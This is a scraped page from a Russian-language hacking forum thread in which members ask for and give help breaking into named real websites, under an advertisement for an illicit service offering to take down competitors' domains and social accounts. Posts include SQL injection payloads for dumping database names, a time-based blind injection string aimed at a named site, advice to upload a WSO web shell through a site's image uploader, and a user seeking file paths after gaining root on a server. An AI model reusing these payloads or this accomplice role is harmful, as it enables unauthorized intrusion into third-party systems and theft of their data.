УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 65 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#641

09.10.2015, 12:21

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от AlexG

AlexG said:
↑
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -

Код:

Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))

для работы с другими базами (как перебрать имена всех баз)?

Вектор объединения значений для extractvalue:

https://rdot.org/forum/showthread.php?t=2860

Код:

Code:
extractvalue(1, concat(0x3A, mid((X), Y, 31)))
X = SELECT convert(max(binary reverse(insert(0x3A, 1, 0, reverse(concat(schema_name, 0x0A))))), char(1000000)) FROM information_schema.schemata

Где Y = 1 + I * 31, i = 0, 1, ...

Но советую вам взять запрос из той темы, через него вы сразу получите и имена всех баз, и имена всех таблиц, и имена всех колонок.

Цитата:

Сообщение от Valer4ik

Valer4ik said:
↑
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'

query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
...
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?

Скули нет. Второй столбец в таблице business_logs является первичным ключем. Он обязан содержать уникальное значение. Так как туда заносятся текущая дата и время, этого не происходит. Вы же выполняете более чем 1 запрос в секунду? Интересно, как сайт вообще работал.

#642

09.10.2015, 17:59

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

Код:

Code:
http://watercorpimagelibrary.com.au

Какой шелл сюда лить? В админке заливка изображений

#643

09.10.2015, 18:39

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от vikler

vikler said:
↑
Какой шелл сюда лить?

а есть варианты? лей wso

#644

09.10.2015, 20:08

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от qaz

qaz said:
↑
а есть варианты? лей wso

варианты есть. если там java, то на wso2.php ему будет плевать.

Цитата:

Сообщение от vikler

vikler said:
↑

Код:

Code:
http://watercorpimagelibrary.com.au

Какой шелл сюда лить? В админке заливка изображений

нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.

#645

10.10.2015, 01:35

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
варианты есть. если там java, то на wso2.php ему будет плевать.
нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.

на оваспе - это где?

#646

10.10.2015, 03:51

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от XAMEHA

XAMEHA said:
↑
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:

Код:

Code:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))

https://rdot.org/forum/showthread.php?t=60&page=3
Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'

Смело считайте, что там ничего нет. Эти
инъекции
стабильно появляются у нас в теме раз в неделю.

То есть

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM ru_video WHERE dateQ №1064[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]You have an error in your SQL syntax[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]check the manual that corresponds to your MySQL server version[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]the right syntax to[/COLOR][COLOR="#007700"]use[/COLOR][COLOR="#0000BB"]near[/COLOR][COLOR="#DD0000"]'-20,20'[/COLOR][COLOR="#0000BB"]at line 1[/COLOR][/COLOR]

можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит

#647

10.10.2015, 12:10

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
То есть

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM ru_video WHERE dateQ №1064[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]You have an error in your SQL syntax[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]check the manual that corresponds to your MySQL server version[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]the right syntax to[/COLOR][COLOR="#007700"]use[/COLOR][COLOR="#0000BB"]near[/COLOR][COLOR="#DD0000"]'-20,20'[/COLOR][COLOR="#0000BB"]at line 1[/COLOR][/COLOR]

можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит

пару страниц назад XAMEHA писал по этому поводу. ничего не получится

#648

10.10.2015, 19:29

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
пару страниц назад XAMEHA писал по этому поводу. ничего не получится

Спасибо, так и думал

#649

10.10.2015, 23:47

ButilkaSoka

Guest

Сообщений: n/a

Провел на форуме:
7285

Репутация: 0

хелп.

сканер нашёл blind sql. Что делать с url такого типа?

если менять значения sleep, то ответ изменяется в соответствии со значениями. sleep(6)=6 сек.

Код:

Code:
_ttp://megakeys.ru/news/if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

куда копать в таком случае?

#650

11.10.2015, 08:59

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел

Как узнать путь?

Доп. Информация: http://pastebin.com/ppPSZ4FH

P.S>Ошибок не выводит на сайте

Страница 65 из 296

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход